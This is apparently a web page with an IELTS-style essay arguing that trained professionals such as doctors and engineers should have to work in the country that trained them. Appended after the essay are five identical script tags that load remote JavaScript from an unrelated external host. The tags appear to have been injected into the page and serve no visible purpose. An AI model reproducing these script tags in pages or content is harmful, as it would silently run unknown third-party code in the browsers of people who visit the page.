Some people believe that professionals, such as doctors and engineers, should be required to work in the country there they did their training. Others believe they should be free to work in another country if they wish

Discuss both views and give your opinion?

Some people think that specialists in intellectual areas, such as medical and engineering employees, should be coerced to contribute to the nation giving them training, whereas others claim that they should have right to select the country they want to devote to. In my opinion, I agree with the first view.

On the one hand, it is said that professional workers should be given a choice to work in the country they like. The primary reason is that they can decide on the working environment which is best suitable for themselves. For example, Vietnam has been training a large number of doctors and scientists throughout decades. However, after graduation, most employees choose to reside in and contribute their skills to developed nations, such as Japan or the US. This is because there are no working contexts which are appropriate for further employment development if they stay in the mother nation. Within a prosperous country, by contrast, they can come into contact with groundbreaking technologies and interact with colleagues on a superior level.

On the other hand, others and I believe that professional workers should be forced to contribute their talent and devotion to the country offering them training. Firstly, this action prevents loss of prominent intellectuals from the nation. Upon training completion, they have to work in national establishments, making contribution to the society in general and the domain they have embarked on in particular. By this way, the mother nation would thrive steadily, and the quantity of annual professional workers can be guaranteed. Finally, this policy can sow the seed of patriotism into residents’ mind. It means that if one country gives a student favorable conditions for professionalism, then that person should devote his skills to the country after achieving a degree, which is a symbol of love for nation in return. With this policy, both the worker and government can enjoy mutual benefits.

In summary, there are merits to both arguments based on the above discussion and analysis, but I believe the first view is more reasonable.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>